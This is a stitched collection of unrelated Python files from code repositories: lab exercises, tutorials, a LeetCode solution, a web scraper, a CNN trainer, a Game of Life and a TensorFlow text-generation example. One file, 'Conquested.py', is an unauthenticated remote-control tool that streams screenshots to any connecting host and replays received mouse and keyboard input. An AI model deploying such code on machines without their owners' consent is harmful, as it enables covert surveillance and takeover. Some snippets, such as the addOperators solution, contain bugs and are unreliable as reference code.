        avgo, maxo = self.getMaxAndAverageMaxOutdegree()
        s = "%f %d %d %f" % (self.getNodesNumberAverage(), self.getTotalNumberOfNodes(), maxo, avgo)
        return s

    def printToFile(self, filename):
        f = open(filename, "w")
        for i in range(len(self.examples)):
            f.write(str(self.examples[i]) + "\n")
        f.close()

    def printToFileSvmlightFormat(self, filename):
        f = open(filename, "w")
        for i in range(len(self.examples)):
            f.write(str(self.examples[i].printFormat("svmlight")) + "\n")
        f.close()
| true |
0d6764e7f042d4c24df7201cf03d613ca76f0c33 | Python | AfiqAmmar/Operating-System-Lab | /Lab 7/Sequential.py | UTF-8 | 1,483 | 3.59375 | 4 | [] | no_license | filelength = 50
# Sequential (contiguous) file-allocation demo: blocks are the entries of
# `files`, 0 = free, 1 = allocated.
files = [0]*filelength
for x in range(files.__len__()):
    files[x] = 0
flag = 1
while flag == 1:
    start = int(input("Please enter the starting block:"))
    # keep asking until the starting block is within 1..filelength
    while (start<=0 or start>filelength):
        if start<=0:
            print("Please enter a positive number!")
        if start>50:
            print("Starting block entered exceeds files limit!")
        start = int(input("Please enter the starting block:"))
    length = int(input("Please enter the length of the files:"))
    while length<=0 or length>filelength:
        if length<=0:
            print("Please enter a positive number!")
        if length>50:
            print("Starting block entered exceeds files limit!")
        length = int(input("Please enter the length of the files:"))
    # count how many of the requested blocks are still free
    # NOTE(review): files[start+x] can index up to start+length-1, which
    # raises IndexError once it reaches filelength -- confirm whether
    # blocks are meant to be 0- or 1-based.
    check = 0
    for x in range(length):
        if files[start+x] == 0:
            check +=1
    # allocate only if the whole contiguous run was free
    if check == length:
        for x in range(length):
            files[start+x] = 1
        print("Files are allocated")
    else:
        print("Files are not allocated")
    choice = True
    while True:
        resume = input(("Do you want to enter more files? (yes/no)"))
        if resume == 'yes' or resume == 'YES':
            flag = 1
            break
        elif resume == 'no' or resume == 'NO':
            flag = 0
            break
        else:
            choice = True
# NOTE(review): this summary only reflects the LAST entered length and
# prints "allocated" even when that request was rejected -- verify intent.
print("Files allocated:")
for x in range(length):
    print(" Files [",x+1,"] allocated")
| true |
0ad25aad0dec558adc06f80596d2304f6cdd71e9 | Python | uni51/python_tutorial | /pyq/25_container/fast_data_dict/py3.py | UTF-8 | 471 | 4.1875 | 4 | [] | no_license | # イテラブルを返すメソッド
d = {'art': 1, 'box': 2, 'cup': 3}
# keys() : returns an iterable over the dictionary's keys.
print('keys:')
for k in d.keys():
    print(k)
print()
# values() : returns an iterable over the dictionary's values.
print('values:')
for v in d.values():
    print(v)
print()
# items() : returns an iterable of (key, value) tuples.
print('items:')
for k, v in d.items():
    print(k, v)
| true |
4e1d3034629934d1dd4d477ed81f342465db6bf7 | Python | KJSui/leetcode-2020 | /expressionAddOperations.py | UTF-8 | 1,055 | 3 | 3 | [] | no_license | class Solution:
def addOperators(self, num, target):
self.res = []
self.dfs(0, 0, 0, 0, [])
return self.res
def dfs(self, num, target, idx, prev, curr, value, string):
if idx == len(num):
if value == target and curr == 0:
self.res.append("".join(string[1:]))
return
curr = curr * 10 + int(num[idx])
str_op = str(curr)
if curr > 0:
self.dfs(num, target, idx+1, prev, curr, value, string)
string.append('+')
string.append(str_op)
self.dfs(num, target, idx+1, prev, 0, value+curr, string)
string.pop()
string.pop()
if string:
string.append('-')
string.append(str_op)
self.dfs(idx+1, -curr, 0, value-curr, string)
string.pop()
string.pop()
string.append('*')
string.append(str_op)
self.dfs(idx+1, curr * prev, 0, value-prev+ curr * prev, string)
string.pop()
string.pop()
| true |
d052cbb994497d25f90d44df289a24b5777ac972 | Python | pulakanamnikitha/nikki | /37.py | UTF-8 | 77 | 2.6875 | 3 | [] | no_license | x,y=map(int,raw_input().split())
# Python 2 script: x and y are already ints after map(int, ...), so the
# int() calls below are redundant but harmless.
n1=int(x)
n2=int(y)
# tuple assignment swaps the two values in place
n1,n2=n2,n1
print n1,n2
| true |
8499c977f689e781c9716c2edcd965a684378c70 | Python | AlimiG/Euler | /609_pi_sequence.py | UTF-8 | 494 | 3.3125 | 3 | [] | no_license | def sieve(n):
is_prime = [True]*n
is_prime[0] = False
is_prime[1] = False
for i in range(2,int(n**0.5) +1):
index = i*2
while index < n:
is_prime[index] = False
index = index + i
prime = []
for i in range(n):
if is_prime[i] == True:
prime.append(i)
return prime
# prime lookup table shared by pi(); usable arguments are bounded by the
# largest prime below 10000
primes = sieve(10000)
def pi(n):
    # count the primes strictly below n by walking the table until a
    # prime >= n is reached
    # NOTE(review): pi(0) returns -1, and n beyond the last table entry
    # raises IndexError -- verify callers stay within range
    j = 0
    summ = 0
    while j < n:
        j = primes[summ]
        summ = summ + 1
    return (summ-1)
| true |
894c3cff96caa1612132bd10913b31d5cdd3b3f9 | Python | hisyatokaku/Competition | /ABC/110/C.py | UTF-8 | 504 | 3.0625 | 3 | [] | no_license | S = input()
T = input()
# per-character position lists for T (c2pos) and for S (s_c2pos);
# S is read on the preceding line of this script
c2pos=dict()
s_c2pos = dict()
for ix, c in enumerate(S):
    if s_c2pos.get(c) == None:
        s_c2pos[c] = [ix]
    else:
        s_c2pos[c].append(ix)
for ix, c in enumerate(T):
    if c2pos.get(c) == None:
        c2pos[c] = [ix]
    else:
        c2pos[c].append(ix)
res = "Yes"
for k, v in c2pos.items():
    if len(v) < 1:
        continue
    # all positions of a T-character must carry a single S-character
    if len(set([S[_v] for _v in v])) != 1:
        res = "No"
    # and that S-character must occupy exactly the same positions,
    # i.e. the character mapping S -> T is one-to-one
    if s_c2pos[S[v[0]]] != v:
        res = "No"
print(res)
| true |
2c74253f08f6f1c1af1bbb46bf5c87991b2856a6 | Python | kimgs20/PyTorch | /torch_expand.py | UTF-8 | 748 | 3.625 | 4 | [] | no_license | '''
torch.repeat(*sizes)
copy tensor
torch.expand(*sizes)
same as repeat but can use only 1-dimension
'''
import torch
'''
# torch.repeat(*sizes)
x = torch.tensor([1, 2, 3])
x_42 = x.repeat(4, 2) # 4row 2column
print(x_42)
print(x_42.size()) # [4, 6]
x_421 = x.repeat(4, 2, 1)
print(x_421)
print(x_421.size()) # [4, 2, 3]
'''
# torch.expand(*sizes): broadcast size-1 dimensions to larger sizes
# without copying the underlying data
x = torch.tensor([[1], [2], [3]])
print(x.size())
print()
x_exp = x.expand(3, 1)
print(x_exp)
print()
x_exp = x.expand(3, 3)
print(x_exp)
print()
x_exp = x.expand(3, 4) # if first dim is not 3, error occurs
print(x_exp)
print(x_exp.size())
print()
x_exp_mi = x.expand(-1, 4) # -1 means not changing the size of that dimension
print(x_exp_mi)
print(x_exp_mi.size())
# x_exp == x_exp_mi'''
bccc63db7d06a54bc5efb30cf4f4ccc3ae6301a8 | Python | NIU-Data-Science/CNN-exercise | /CNN_trainer.py | UTF-8 | 3,279 | 3.25 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 30 10:30:02 2018
@author: Dr. Mark M. Bailey | National Intelligence University
"""
"""
Usage notes:
This training script requires a file hierarchy as follows, which exists in the SAME directory as this script:
training_set
Label1
Label2
test_set
Label1
Label2
This script will export the model artifact (*.h5) to the same directory as this script.
"""
print('Loading...')
#Import Keras libraries and packages
from keras.models import Sequential
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers import Dense
import os
#Helper function
def get_files(directory):
    """Walk *directory* recursively and return the full path of every
    file found (directories themselves are not included)."""
    collected = []
    for root, dirs, filenames in os.walk(directory):
        collected.extend(os.path.join(root, fname) for fname in filenames)
    return collected
print('CNN will build your convolutional neural network!')
print('====================================================')
print('Accessing image data...')
model_name = 'CNN_model'
# count the images under training_set/ and test_set/ (see usage notes in
# the module docstring for the expected directory layout)
training_files_list = get_files(os.path.join(os.getcwd(), 'training_set'))
train_number = len(training_files_list)
test_files_list = get_files(os.path.join(os.getcwd(), 'test_set'))
test_number = len(test_files_list)
print('Training model...')
#Instantiate the convolutional neural network
classifier = Sequential()
#Convolution
classifier.add(Conv2D(32, (3, 3), input_shape = (64, 64, 3), activation = 'relu'))
#Pooling
classifier.add(MaxPooling2D(pool_size = (2, 2)))
#Add a second convolutional layer
classifier.add(Conv2D(32, (3, 3), activation = 'relu'))
classifier.add(MaxPooling2D(pool_size = (2, 2)))
#Flattening
classifier.add(Flatten())
#Full connection
classifier.add(Dense(units = 128, activation = 'relu'))
classifier.add(Dense(units = 1, activation = 'sigmoid'))
#Compiling the CNN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
#Fitting the CNN to the images
from keras.preprocessing.image import ImageDataGenerator
# NOTE(review): validation_generator below is created but never used;
# the binary-mode test_set generator further down serves as validation
test_datagen = ImageDataGenerator(rescale=1. / 255)
validation_generator = test_datagen.flow_from_directory('test_set', target_size=(64, 64), batch_size=32, class_mode='categorical')
train_datagen = ImageDataGenerator(rescale = 1./255, shear_range = 0.2, zoom_range = 0.2, horizontal_flip = True)
test_datagen = ImageDataGenerator(rescale = 1./255)
training_set = train_datagen.flow_from_directory('training_set', target_size = (64, 64), batch_size = 32, class_mode = 'binary')
test_set = test_datagen.flow_from_directory('test_set', target_size = (64, 64), batch_size = 32, class_mode = 'binary')
# NOTE(review): steps_per_epoch/validation_steps are set to the raw image
# counts; with batch_size=32 the conventional value is count // 32 --
# confirm whether oversampling per epoch is intended
classifier.fit_generator(training_set, steps_per_epoch = train_number, epochs = 25, validation_data = test_set, validation_steps = test_number)
classes = training_set.class_indices
#Export CNN model
print('Exporting model...')
import json
# persist the label -> index mapping next to the model artifact
with open('classes.json', 'w') as outfile:
    json.dump(classes, outfile)
model_name_str = model_name + '.h5'
classifier.save(model_name_str)
print('CNN model exported as {}'.format(model_name_str))
print('You are a great American!!')
d11826f08424d9e45609674452a36426bb5eaa8a | Python | Kwangwoo94/pythonsource-vscode- | /beautifulsoup/clien2.py | UTF-8 | 834 | 3.03125 | 3 | [] | no_license | import requests
from bs4 import BeautifulSoup
import xlsx_write as excel
# Crawl the post titles on page 1 of the "tips & lectures" board of clien
# https://www.clien.net/service/board/lecture
response = requests.get("https://www.clien.net/service/board/lecture")
soup = BeautifulSoup(response.content,'html.parser')
# locate the title elements
titles = soup.select("span.subject_fixed")
# start from an empty list of rows (one single-cell row per title)
board_list = list()
for title in titles:
    # print(title.string.strip())
    board_title = [title.string.strip()]
    print(board_title)
    board_list.append(board_title)
# board_list ends up like [['title 1'], ['title 2'], ...]
# write the rows into the spreadsheet (sheet name is Korean for
# "tips & lectures")
excel.write_excel_template("clien1.xlsx","팁과강좌",board_list)
| true |
f32836b6e401c3ae84fb17e37bb925e82d382cfc | Python | AlexGumash/Big-Data-and-IKhiIAS | /lab2/stripes/formatOutput.py | UTF-8 | 746 | 2.890625 | 3 | [] | no_license | #!/usr/bin/python2
import pyhdfs
import ast, json
# Python 2 script: print the `count` items most frequently co-purchased
# with `word`, from a stripes-style MapReduce output on HDFS.
# NOTE(review): in Python 2, input() eval()s what the user types --
# raw_input() would be the safe choice here.
word = str(input("Your word: "))
count = int(input("Count: "))
fs = pyhdfs.HdfsClient(hosts='localhost:50070', user_name='bsbo228')
output = fs.open('/user/bsbo228/lab2/output/part-00000')
for line in output:
    # each line is "key<TAB>{'item': count, ...}" (single-quoted dict)
    striped = line.strip().split("\t")
    key = striped[0].split(',')[0]
    d = striped[1]
    # swap quotes so the stripe parses as JSON, then normalize via
    # literal_eval into a plain dict
    d = json.loads(d.replace("'", "\""))
    d = ast.literal_eval(json.dumps(d))
    if key == word:
        # sort co-purchase counts in descending order
        list_d = list(d.items())
        list_d.sort(key=lambda i: i[1], reverse=True)
        j = 0
        print (str(count) + " most purchased items with item " + word)
        for i in list_d:
            if j < count:
                print str(i[0])+': ' + str(i[1])
                j += 1
b41e6282657cf98a17b8a2938b53f872cb2f88b9 | Python | diego-go/taller_python_PROTECO | /1er semana/paquetes/ConwayCPU-0.5/bin/ConwayCPU.py | UTF-8 | 7,505 | 3.234375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
"""Conway's Game of Life, drawn to the terminal care of the Blessings lib
A board is represented like this::
{(x, y): state,
...}
...where ``state`` is an int from 0..2 representing a color.
"""
from contextlib import nested
from itertools import chain
from random import randint
from sys import stdout
from sys import argv
from time import sleep, time
from blessings import Terminal
from psutil import cpu_percent
from random import random
def main():
    """Play Conway's Game of Life on the terminal."""
    # Python-2-only tuple parameter syntax below; this script targets
    # Python 2 throughout.
    def die((x, y)):
        """Pretend any out-of-bounds cell is dead."""
        if 0 <= x < width and 0 <= y < height:
            return x, y

    LOAD_FACTOR = 10  # Smaller means more crowded.
    NUDGING_LOAD_FACTOR = LOAD_FACTOR * 3  # Smaller means a bigger nudge.

    term = Terminal()
    width = term.width
    height = term.height
    board = random_board(width - 1, height - 1, LOAD_FACTOR)
    # detector = BoredomDetector()
    cells = cell_strings(term)
    # optional CLI argument: the CPU fraction treated as "full load"
    if len(argv) > 1:
        cpu_cap = float(argv[1])
    else:
        cpu_cap = 1
    # one vertical screen section per CPU core, each driven by that
    # core's own agitation factor
    section_width = width/len(cpu_percent(interval=0.1, percpu=True)) + \
                    len(cpu_percent(interval=0.1, percpu=True))
    with nested(term.fullscreen(), term.hidden_cursor()):
        try:
            while True:
                # aim for roughly 0.4 s per frame
                frame_end = time() + 0.4
                board = next_board(board, section_width,
                                   map(lambda X: get_agitation(X, cpu_cap), cpu_percent(interval=0.2, percpu=True)),
                                   die)
                # board.update(agitate_board(board, 1 - cpu_percent(interval=0.2)/100))
                draw(board, term, cells)

                # If the pattern is stuck in a loop, give it a nudge:
                # if detector.is_bored_of(board):
                #     board.update(random_board(width - 1,
                #                               height - 1,
                #                               NUDGING_LOAD_FACTOR))
                stdout.flush()
                sleep_until(frame_end)
                clear(board, term, height)
        except KeyboardInterrupt:
            pass
def sleep_until(target_time):
    """Block until the wall clock reaches *target_time* (seconds since the
    epoch); return immediately if that instant has already passed."""
    remaining = target_time - time()
    if remaining > 0:
        sleep(remaining)
def cell_strings(term):
    """Return the strings that represent each possible living cell state.

    Return the most colorful ones the terminal supports.

    """
    num_colors = term.number_of_colors
    if num_colors >= 16:
        funcs = term.on_bright_cyan, term.on_bright_cyan, term.on_bright_green, term.on_bright_yellow
    elif num_colors >= 8:
        funcs = term.on_cyan, term.on_cyan, term.on_green, term.on_yellow
    else:
        # For black and white, use the checkerboard cursor from the vt100
        # alternate charset:
        # NOTE(review): this branch yields 3 cell strings while the color
        # branches yield 4 -- a board state of 3 would index out of range
        # on monochrome terminals; verify against next_board's states.
        return (term.reverse(' '),
                term.smacs + term.reverse('a') + term.rmacs,
                term.smacs + 'a' + term.rmacs)

    # Wrap spaces in whatever pretty colors we chose:
    return [f(' ') for f in funcs]
def random_board(max_x, max_y, load_factor):
    """Return a random board with given max x and y coords.

    The board is a dict mapping (x, y) -> 0 with about
    max_x * max_y / load_factor cells; duplicate random rolls collapse,
    so the result may contain fewer entries.
    """
    # range() replaces the Python-2-only xrange(); iteration behavior is
    # identical, and the code now also runs under Python 3.
    return dict(((randint(0, max_x), randint(0, max_y)), 0) for _ in
                range(int(max_x * max_y / load_factor)))
# def agitate_board(board, factor):
# # Consider only the neighbors of currently living cells
# spawn_points = set(chain(*map(neighbors, board)))
# agitated_board = {}
# print factor**(factor*100)
# for point in spawn_points:
# should_spawn = (factor**(factor*50))/2
# if should_spawn > random():
# state = 3
# else:
# state = None
# if state is not None:
# agitated_board[point] = state
# return agitated_board
def clear(board, term, height):
    """Clear the droppings of the given board.

    Erases every row of the screen; Python 2 print statement with a
    trailing comma suppresses the newline.
    """
    for y in xrange(height):
        print term.move(y, 0) + term.clear_eol,
def draw(board, term, cells):
    """Draw a board to the terminal.

    Each cell's integer state indexes into ``cells`` to pick its glyph;
    ``term.location`` moves the cursor without disturbing the rest.
    """
    for (x, y), state in board.iteritems():
        with term.location(x, y):
            print cells[state],
def get_agitation(raw_cpu, cap):
    """Map a raw CPU percentage (0-100) to an agitation value in [0, ~0.28].

    Usage is normalized by ``cap``, clamped to 1, then pushed through a
    steep power curve so only near-cap load produces much agitation.
    """
    usage_fraction = raw_cpu / 100
    clamped = min(usage_fraction / cap, 1)
    return (clamped / 1.2) ** 7
def next_board(board, section_width, agitation_factors, wrap):
    """Given a board, return the board one interation later.

    Adapted from Jack Diedrich's implementation from his 2012 PyCon talk
    "Stop Writing Classes".

    :arg section_width: width of one per-CPU screen section; a point's x
        coordinate selects its section's agitation factor (Python 2
        integer division).
    :arg agitation_factors: per-section probabilities of spontaneous birth.
    :arg wrap: A callable which takes a point and transforms it, for example
        to wrap to the other edge of the screen. Return None to remove a
        point.
    """
    new_board = {}
    # We need consider only the points that are alive and their neighbors:
    points_to_recalc = set(board.iterkeys()) | set(chain(*map(neighbors, board)))
    for point in points_to_recalc:
        agitation_factor = agitation_factors[point[0]/section_width]
        # Count live neighbors after wrapping; wrap() returning None drops
        # the neighbor from consideration.
        count = sum((neigh in board) for neigh in
                    (wrap(n) for n in neighbors(point) if n))
        if point in board:
            # Survival: 2 or 3 neighbors. States 0/2 distinguish cell age
            # (see cell_strings); anything older than "new" becomes 2.
            if count == 2 or count == 3:
                state = 0 if board[point] < 2 else 2
            else:
                state = None
        else:
            # Birth: exactly 3 neighbors, or a CPU-load-driven random
            # spawn with 2 or 4 neighbors (state 3 marks agitation births).
            if count == 3:
                state = 1
            elif (count == 2 or count == 4) and agitation_factor > random():
                state = 3
            else:
                state = None
        if state is not None:
            wrapped = wrap(point)
            if wrapped:
                new_board[wrapped] = state
    return new_board
def neighbors((x, y)):  # Python 2 tuple-parameter syntax
    """Return the (possibly out of bounds) neighbors of a point.

    Yields all 8 Moore-neighborhood coordinates; callers are expected to
    wrap or discard out-of-bounds points themselves.
    """
    yield x + 1, y
    yield x - 1, y
    yield x, y + 1
    yield x, y - 1
    yield x + 1, y + 1
    yield x + 1, y - 1
    yield x - 1, y + 1
    yield x - 1, y - 1
# class BoredomDetector(object):
# """Detector of when the simulation gets stuck in a loop"""
# # Get bored after (at minimum) this many repetitions of a pattern:
# REPETITIONS = 14
# # We can detect cyclical patterns of up to this many iterations:
# PATTERN_LENGTH = 4
# def __init__(self):
# # Make is_bored_of() init the state the first time through:
# self.iteration = self.REPETITIONS * self.PATTERN_LENGTH + 1
# self.num = self.times = 0
# def is_bored_of(self, board):
# """Return whether the simulation is probably in a loop.
# This is a stochastic guess. Basically, it detects whether the
# simulation has had the same number of cells a lot lately. May have
# false positives (like if you just have a screen full of gliders) or
# take awhile to catch on sometimes. I've even seen it totally miss the
# boat once. But it's simple and fast.
# """
# self.iteration += 1
# if len(board) == self.num:
# self.times += 1
# is_bored = self.times > self.REPETITIONS
# if self.iteration > self.REPETITIONS * self.PATTERN_LENGTH or is_bored:
# # A little randomness in case things divide evenly into each other:
# self.iteration = randint(-2, 0)
# self.num = len(board)
# self.times = 0
# return is_bored
if __name__ == '__main__':
    # NOTE(review): no main() is defined in this file as shown -- the game
    # loop above already runs at import time, so this call raises NameError.
    # Confirm whether a main() wrapper was lost in an edit.
    main()
| true |
f15483ab74e3c6abc5dab5787f532b9addf5a139 | Python | CyberAmiAsaf/Control-Conquer | /controlled/Conquested.py | UTF-8 | 5,708 | 2.921875 | 3 | [] | no_license | __author__ = 'Cyber-01'
import socket
import time
from PIL import ImageGrab
import multiprocessing
import win32api,win32con
import sys
SCREEN_PORT = 2346        # TCP port used to stream PNG screenshots
MOUSE_PORT = 3456         # UDP port receiving mouse events
KEYBOARD_PORT = 5678      # UDP port receiving keyboard events
SCREEN_DELAY_TIME = 0.05  # seconds to pause between screenshots
SCREENSHOT_NAME = "scrn.png"  # temp file each captured frame is saved to
def screen():
    """
    A function that takes screenshots throughout the connection and sends
    them to the controller.

    Accepts a single TCP client, then loops forever: grab the screen, save
    it as a PNG, and send the file's bytes over the socket.
    """
    print "Server Running"
    server_socket = socket.socket()
    server_socket.bind(('0.0.0.0',SCREEN_PORT)) # Start the socket's server
    server_socket.listen(5)
    (new_socket, address) = server_socket.accept()
    print "Client Connected"
    last_binary_data = ""
    while True:
        # NOTE(review): last_binary_data is reset every frame, so the inner
        # while below runs at most twice per frame -- it sends each frame
        # once, not a diff. Confirm that is the intent.
        last_binary_data = ""
        img = ImageGrab.grab(bbox=None) # Take screen shot
        img.save(SCREENSHOT_NAME) # Save screen shot
        fp = open(SCREENSHOT_NAME,'rb') # open screen shot file to read
        data = fp.read() # Read all
        while data != last_binary_data: # while not all the data is sent
            new_socket.send(data) # Send all data
            last_binary_data = data
        fp.close() # Close file
        time.sleep(SCREEN_DELAY_TIME) # Delay in order to boost quality
def mouse_click(button, x, y):
    """Press the given mouse button ('L', 'R' or 'M') at position (x, y)."""
    down_events = {
        "L": win32con.MOUSEEVENTF_LEFTDOWN,
        "R": win32con.MOUSEEVENTF_RIGHTDOWN,
        "M": win32con.MOUSEEVENTF_MIDDLEDOWN,
    }
    if button in down_events:
        win32api.mouse_event(down_events[button], x, y, 0, 0)
def mouse_release(button, x, y):
    """Release the given mouse button ('L', 'R' or 'M') at position (x, y)."""
    up_events = {
        "L": win32con.MOUSEEVENTF_LEFTUP,
        "R": win32con.MOUSEEVENTF_RIGHTUP,
        "M": win32con.MOUSEEVENTF_MIDDLEUP,
    }
    if button in up_events:
        win32api.mouse_event(up_events[button], x, y, 0, 0)
def mouse_wheel_movement(button, x, y):
    """Scroll the wheel one notch: "-1" scrolls down, "1" scrolls up."""
    deltas = {"-1": -win32con.WHEEL_DELTA, "1": win32con.WHEEL_DELTA}
    if button in deltas:
        win32api.mouse_event(win32con.MOUSEEVENTF_WHEEL, x, y, deltas[button], 0)
def mouse():
    """
    Receive the controller's mouse events over UDP and replay them locally.

    Packets longer than 2 bytes are "(x,y)" move events; 2-byte packets are
    button press ('*')/release ('^') events or wheel moves; 1-byte packets
    are wheel moves.
    """
    mouse_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # Client Startup to udp
    mouse_socket.bind(('0.0.0.0',MOUSE_PORT))
    # BUG FIX: initialize the cursor position. Previously x/y were unbound
    # until the first move packet, so a click arriving first raised a
    # NameError (silently swallowed by the except below).
    x, y = 0, 0
    while True:
        # except Exception (not bare except) so KeyboardInterrupt/SystemExit
        # can still stop the loop; malformed packets are ignored as before.
        try:
            data,address = mouse_socket.recvfrom(1024)
            if len(data) > 2:
                # Move event, formatted "(x,y)".
                position = data.split(",")
                x = int(position[0][1:])
                y = int(position[1][:-1])
                win32api.SetCursorPos((x,y)) # A function that receives the mouse coordinates and sets them accordingly
            if len(data) == 2:
                if data[1] == "L":
                    if data[0] == "*":
                        mouse_click(data[1],x,y) # Left mouse Click
                    else:
                        mouse_release(data[1],x,y) # Left mouse Release
                if data[1] == "R":
                    if data[0] == "*":
                        mouse_click(data[1],x,y) # Right mouse Click
                    else:
                        mouse_release(data[1],x,y) # Right mouse Release
                if data[1] == "M":
                    if data[0] == "*":
                        mouse_click(data[1],x,y) # Middle mouse Click
                    else:
                        mouse_release(data[1],x,y) # Middle mouse Release
                if data[1] == "1":
                    # Two-byte wheel packets ("-1"/"*1") pass the raw data.
                    mouse_wheel_movement(data, x, y) # Mouse wheel movement
            if len(data) == 1:
                mouse_wheel_movement(data, x, y) # Mouse wheel movement
        except Exception:
            pass
def key_press(data):
    """Press the virtual key whose hex code follows the '*' in the payload."""
    keycode = int(data[0][1:], 16)  # strip the prefix, parse hex to int
    win32api.keybd_event(keycode, 0, 0, 0)
def key_release(data):
    """Release the virtual key whose hex code follows the '^' in the payload."""
    keycode = int(data[0][1:], 16)  # strip the prefix, parse hex to int
    win32api.keybd_event(keycode, 0, win32con.KEYEVENTF_KEYUP, 0)
def keyboard(process_list):
    """
    Receive the controller's keyboard events over UDP and replay them.

    ``data`` below is the full (payload, address) tuple from recvfrom --
    it is not unpacked -- so data[0] is the payload string. A literal
    "Pause" payload terminates the screen and mouse processes and exits;
    '*'-prefixed payloads are key presses, '^'-prefixed are releases.
    """
    keyboard_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # Client Startup to udp
    keyboard_socket.bind(('0.0.0.0',KEYBOARD_PORT))
    while True:
        try:
            data = keyboard_socket.recvfrom(1024)
            if data[0] == "Pause":
                process_list[0].terminate()
                process_list[1].terminate()
                sys.exit()
            elif data[0][0] == "*":
                key_press(data)
            if data[0][0] == "^":
                key_release(data)
        except:
            # Best-effort: ignore malformed packets and keep listening.
            continue
def main():
    """Start the screen, mouse and keyboard handlers as child processes."""
    process_list = []
    screen_process = multiprocessing.Process(target=screen)
    screen_process.start()
    process_list.append(screen_process)
    mouse_process = multiprocessing.Process(target=mouse)
    mouse_process.start()
    process_list.append(mouse_process)
    # BUG FIX: target must be the callable itself. The previous code wrote
    # target=keyboard(process_list), which called keyboard() immediately in
    # this process (blocking forever on the socket) instead of spawning it.
    keyboard_process = multiprocessing.Process(target=keyboard,
                                               args=(process_list,))
    keyboard_process.start()
    process_list.append(keyboard_process)


if __name__ == '__main__':
    main()
261360b0c34e8b35583efb61e742c2c0415bb50e | Python | BrutalWinter/TF_tutorial | /2 Text generation with an RNN.py | UTF-8 | 6,226 | 3.71875 | 4 | [] | no_license | import tensorflow as tf
import numpy as np
import os
import time
# Download the Shakespeare corpus (cached by Keras after the first run).
path_to_file = tf.keras.utils.get_file('shakespeare.txt', 'https://storage.googleapis.com/download.tensorflow.org/data/shakespeare.txt')
# First, look in the text: Read, then decode for py2 compat.
text = open(path_to_file, 'rb').read().decode(encoding='utf-8')
print('Length of text: {} characters'.format(len(text)))
# Take a look at the first 250 characters in text
print(text[:250])
# The unique characters in the file
vocab = sorted(set(text))
print('{} unique characters'.format(len(vocab)))
# Vectorize the text
# Before training, you need to map strings to a numerical representation. Create two lookup tables: one mapping characters to numbers, and another for numbers to characters.
# Creating a mapping from unique characters to indices
char2idx = {u:i for i, u in enumerate(vocab)}
idx2char = np.array(vocab)
print('idx2char',idx2char)
# Encode the whole corpus as an int array using the lookup table.
text_as_int = np.array([char2idx[c] for c in text])
# Now you have an integer representation for each character. Notice that you mapped the character as indexes from 0 to len(unique).
print('{')
for char,_ in zip(char2idx, range(30)):
    print('  {:4s}: {:3d},'.format(repr(char), char2idx[char]))
print('}')
# Show how the first 13 characters from the text are mapped to integers
print('{} ---- characters mapped to int ---- > {}'.format(repr(text[:13]), text_as_int[:13]))
######################## The prediction task
# 1. Given a character, or a sequence of characters, what is the most probable next character?
#    This is the task you're training the model to perform. The input to the model will be a sequence of characters,
#    and you train the model to predict the output -- the following character at each time step.
# 2. Since RNNs maintain an internal state that depends on the previously seen elements, given all the characters computed until this moment, what is the next character?
# 3. Create training examples and targets:
#    Next divide the text into example sequences. Each input sequence will contain seq_length characters from the text.
#    For each input sequence, the corresponding targets contain the same length of text, except shifted one character to the right.
#    So break the text into chunks of seq_length+1. For example, say seq_length is 4 and our text is "Hello". The input sequence would be "Hell", and the target sequence "ello".
#    To do this first use the tf.data.Dataset.from_tensor_slices function to convert the text vector into a stream of character indices.
# The maximum length sentence you want for a single input in characters
seq_length = 100
examples_per_epoch = len(text)//(seq_length+1)
# Create training examples / targets
char_dataset = tf.data.Dataset.from_tensor_slices(text_as_int)
for i in char_dataset.take(15):
    print(idx2char[i.numpy()])
# Group the character stream into fixed-size (seq_length+1) chunks.
sequences = char_dataset.batch(seq_length+1, drop_remainder=True)
for item in sequences.take(2):
    print(item, len(item))
    print(idx2char[item.numpy()])
    A=repr(''.join(idx2char[item.numpy()]))
    print(A,len(A))
# For each sequence, duplicate and shift it to form the input and target text by using the map method to apply a simple function to each batch:
print('sequences',sequences)
def split_input_target(chunk):
    """Split a length-(L+1) sequence into (input, target) shifted by one step."""
    return chunk[:-1], chunk[1:]
# Build (input, target) pairs from each chunk.
dataset = sequences.map(split_input_target)
print('dataset',dataset)
# Each index of these vectors is processed as a one time step.
# For the input at time step 0, the model receives the index for "F" and tries to predict the index for "i" as the next character.
# At the next timestep, it does the same thing but the RNN considers the previous step context in addition to the current input character.
for input_example, target_example in dataset.take(2):
    print('Input data: ', repr(''.join(idx2char[input_example.numpy()])),input_example.shape)
    print('Target data:', repr(''.join(idx2char[target_example.numpy()])),target_example.shape)
    for i, (input_idx, target_idx) in enumerate(zip(input_example[:5], target_example[:5])):
        print("Step {:4d}".format(i))
        print("  input: {} ({:s})".format(input_idx, repr(idx2char[input_idx])))
        print("  expected output: {} ({:s})".format(target_idx, repr(idx2char[target_idx])))
BATCH_SIZE = 64
# Buffer size to shuffle the dataset (TF data is designed to work with possibly infinite sequences, so it doesn't attempt to shuffle the entire sequence in memory.
# Instead, it maintains a buffer in which it shuffles elements).
BUFFER_SIZE = 10000
dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True)
print('dataset',dataset)
# Use tf.keras.Sequential to define the model. For this simple example three layers are used to define our model:
# 1.tf.keras.layers.Embedding: The input layer. A trainable lookup table that will map the numbers of each character to a vector with embedding_dim dimensions;
# 2.tf.keras.layers.GRU: A type of RNN with size units=rnn_units (You can also use an LSTM layer here.)
# 3.tf.keras.layers.Dense: The output layer, with vocab_size outputs.
vocab_size = len(vocab)# Length of the vocabulary in chars
embedding_dim = 256# The embedding dimension
rnn_units = 1024# Number of RNN units
def build_model(vocab_size, embedding_dim, rnn_units, batch_size):
    """Assemble the character model: embedding -> GRU -> per-character logits."""
    embedding = tf.keras.layers.Embedding(
        vocab_size, embedding_dim, batch_input_shape=[batch_size, None])
    recurrent = tf.keras.layers.GRU(
        rnn_units, return_sequences=True, stateful=True,
        recurrent_initializer='glorot_uniform')
    logits = tf.keras.layers.Dense(vocab_size)
    return tf.keras.Sequential([embedding, recurrent, logits])
# Instantiate the model for training-batch-sized input.
